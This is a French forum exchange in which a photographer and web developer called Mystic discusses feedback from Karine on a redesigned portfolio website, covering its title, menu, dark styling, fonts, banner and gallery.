La liste de shoot n'est pas une liste de ce que je prépare avec des clients mais des thèmes que je souhaiterai réaliser et/ou qui pourraient donner des idées à d'éventuel(le)s client(e)s.

Ma galerie est en cours de refonte totale, car l'actuelle regroupe trop de photos dont des photos perso. C'est ma prochaine grosse modification de site.

En tout cas merci pour tout cela :) je vais faire en sorte de l'améliorer au mieux.

Karine a écrit :

Bonjour Mystic,

Ca fait pas mal de temps que je ne suis plus retournée sur ton site. J'ai vu l'évolution par rapport à ce que tu avais fait au début, et en toute sincérité, je ne peux que te féliciter du changement. Le menu est clair. Le seul petit truc c'est la phrase entre parenthèse (et développeur web à ses heures perdues).

Si tu proposes tes sites web, c'est pas à tes heures perdues. C'est du vrai boulot, avec des vrais clients. Donc, il faut assumer ! Du coup, en titre je mettrai simplement "Mystic WebPics - Photographe et webmaster" ou un truc comme ça. Comme tu mets dans ton menu les deux disciplines au même niveau, il est logique que tu les présentes aussi au même niveau dans le titre.

Est-ce que ça te plait plus à toi cette nouvelle présentation par rapport à la première ? Vois-tu la différence ?
Pour ce qui est des gouts, c'est vrai que c'est un peu sombre/contrasté pour moi et la police du titre ne me plait pas trop. Mais comme le site doit représenter pour tes clients ce que tu es capables de faire et comme c'est ta vitrine, il faut que ça reste un site qui corresponde à ce que tu ferai à un client sans avis extérieur.

Bonjour Karine,

Merci d'avoir pris le temps également d'aller à nouveau sur mon site.

En effet j'ai fait un site bien plus propre et lisible, tout est à sa place et est facile d'accès via le menu. Celui ci me plait bien plus que le précédent.

La bannière devrait changer sous peu justement je fais des essais actuellement sur différentes bannières pour voir celle qui me conviendrait le mieux.

La police du titre est celle que j'ai trouvé la moins pire pour le moment mais je vais je pense revenir sur une police plus "passe partout" et commune.

J'ai voulu miser sur le côté sobre, épuré pour ma vitrine plutôt que de la couleur qui peut faire mal aux yeux (aucune critique à voir pour n'importe quel site)